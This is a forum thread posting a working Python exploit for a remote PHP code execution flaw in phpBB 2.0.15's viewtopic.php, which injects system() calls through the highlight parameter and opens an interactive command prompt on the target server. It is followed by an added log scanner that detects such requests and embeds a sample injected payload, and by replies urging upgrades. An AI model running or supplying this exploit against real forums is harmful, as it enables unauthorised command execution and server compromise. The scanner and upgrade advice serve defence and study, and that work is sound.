xisto Community
RemoteConnection

[exploit] Phpbb 2.0.15 "viewtopic.php" Remote PHP Code Execution Exploit

phpBB 2.0.15 "viewtopic.php" Remote PHP Code Execution Exploit


```python
#!/usr/bin/pyth0n
# Python 2 script, as posted.

print "\nphpBB 2.0.15 arbitrary command execution eXploit"
print " 2005 by rattle@awarenetwork.org"
print " well, just because there is none."

import sys
from urllib2 import Request, urlopen
from urlparse import urlparse, urlunparse
from urllib import quote as quote_plus

# Markers printed around the command output so it can be cut out of the HTML reply.
INITTAG = '<g0>'
ENDTAG = '</g0>'

def makecmd(cmd):
    # Encode a string as a PHP chr(N).chr(N)... expression, so no quotes are needed.
    return reduce(lambda x,y: x+'.chr(%d)'%ord(y),cmd[1:],'chr(%d)'%ord(cmd[0]))

# Request template: the payload travels in the "highlight" parameter of viewtopic.php.
_ex = "%sviewtopic.php?t=%s&highlight=%%27."
_ex += "printf(" + makecmd(INITTAG) + ").system(%s)."
_ex += "printf(" + makecmd(ENDTAG) + ").%%27"

def usage():
    print """Usage: %s <forum> <topic>
forum - fully qualified url to the forum
example:
""" % sys.argv[0]; sys.exit(1)

if __name__ == '__main__':
    if len(sys.argv) < 3 or not sys.argv[2].isdigit():
        usage()
    else:
        print
        # Normalise the forum URL: default scheme and path, no params/query/fragment.
        url = sys.argv[1]
        if url.count("://") == 0:
            url = "http://" + url
        url = list(urlparse(url))
        host = url[1]
        if not host: usage()
        if not url[0]: url[0] = 'http'
        if not url[2]: url[2] = '/'
        url[3] = url[4] = url[5] = ''
        url = urlunparse(url)
        if url[-1] != '/': url += '/'
        topic = quote_plus((sys.argv[2]))
        while 1:
            try:
                cmd = raw_input("[%s]$ " % host).strip()
                if cmd[-1]==';': cmd=cmd[:-1]
                if (cmd == "exit"): break
                else: cmd = makecmd(cmd)
                out = _ex % (url,topic,cmd)
                try: ret = urlopen(Request(out)).read()
                except KeyboardInterrupt: continue
                except: pass
                else:
                    # Keep only the text between the two marker tags.
                    ret = ret.split(INITTAG,1)
                    if len(ret)>1: ret = ret[1].split(ENDTAG,1)
                    if len(ret)>1:
                        ret = ret[0].strip();
                        if ret: print ret
                        continue;
                print "EXPLOIT FAILED"
            except:
                continue
```

Edited by cmatcmextra (see edit history)
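
Defensive counterpart to the script above, as an added example that is not part of the original post: a Python 3 scanner that flags `viewtopic.php` requests of this shape in a web server access log and decodes the `chr()` chains to show which strings were injected. The log lines are constructed samples; the function names and the list of PHP function names are assumptions of this example, and the second URL-decoding pass goes beyond the request format shown above.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# PHP calls that have no business inside a search-highlight term (illustrative list).
PHP_CALL = re.compile(r"\b(system|passthru|exec|shell_exec|eval|printf|chr)\s*\(", re.I)
CHR_CHAIN = re.compile(r"chr\(\d{1,3}\)(?:\.chr\(\d{1,3}\))*", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (Apache combined-log style, documentation IP ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jul/2005:10:00:00 +0000] "GET /phpBB2/viewtopic.php?t=1&highlight=search+term HTTP/1.1" 200 5120',
    '192.0.2.10 - - [01/Jul/2005:10:00:05 +0000] "GET /phpBB2/viewtopic.php?t=1&highlight=o%27brien HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jul/2005:10:01:00 +0000] "GET /phpBB2/viewtopic.php?t=1&highlight=%27.'
    'printf(chr(60).chr(103).chr(48).chr(62)).system(chr(105).chr(100)).'
    'printf(chr(60).chr(47).chr(103).chr(48).chr(62)).%27 HTTP/1.1" 200 6200',
]

def decode_chr_chain(chain):
    """Turn 'chr(105).chr(100)' back into the string it builds ('id')."""
    return "".join(chr(int(n)) for n in re.findall(r"\d+", chain))

def inspect_line(line):
    """Return None for a benign line, else the decoded highlight value and its strings."""
    m = REQUEST.search(line)
    if not m:
        return None
    parts = urlsplit(m.group(1))
    if not parts.path.lower().endswith("viewtopic.php"):
        return None
    for value in parse_qs(parts.query, keep_blank_values=True).get("highlight", []):
        # parse_qs decodes once; decode again so a double-encoded quote (%2527) is seen too.
        decoded = unquote_plus(value)
        if "'" in decoded and PHP_CALL.search(decoded):
            chains = CHR_CHAIN.findall(decoded)
            return {"highlight": decoded,
                    "decoded_strings": [decode_chr_chain(c) for c in chains]}
    return None

def scan(lines):
    findings = []
    for number, line in enumerate(lines, 1):
        hit = inspect_line(line)
        if hit:
            findings.append((number, hit))
    return findings

if __name__ == "__main__":
    for number, hit in scan(SAMPLE_LOG):
        print(f"line {number}: injected strings {hit['decoded_strings']}")
```

A plain quote in a search term (the `o%27brien` sample) is not flagged; a hit needs both the quote and a PHP call in the decoded `highlight` value.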

You could give the security updates link of the phpbb dot com homepage. Not only does phpBB 2.0.15 have security exploits, even 2.0.16 also has one or more problems, and phpBB already released 2.0.17 some time ago, fixing all the exploits found so far, and has advised all the software users to upgrade their forums/boards as soon as possible. I was updating one of the boards from 2.0.10 to 2.0.17; it took more than 2 hours to finish all the updates, and now I can sleep peacefully. Those who haven't updated their boards can look for upgrade mods, which are good for those who installed many mods in their boards. Look out for those mods on the phpbb dot com homepage.

It's amazing, I don't know who's coming out with more bugs, IPB or phpBB, but yeah, you let those at phpBB know about this as well.

As with all other software and scripts, phpBB also has a long history of vulnerabilities. But it is better than others because of the quick developer community response to newly found security loopholes. phpBB issues are generally fixed in much less time than in other systems, and that is why I like phpBB. For the user, it is always good practice to bookmark the phpBB homepage to get the update news in time.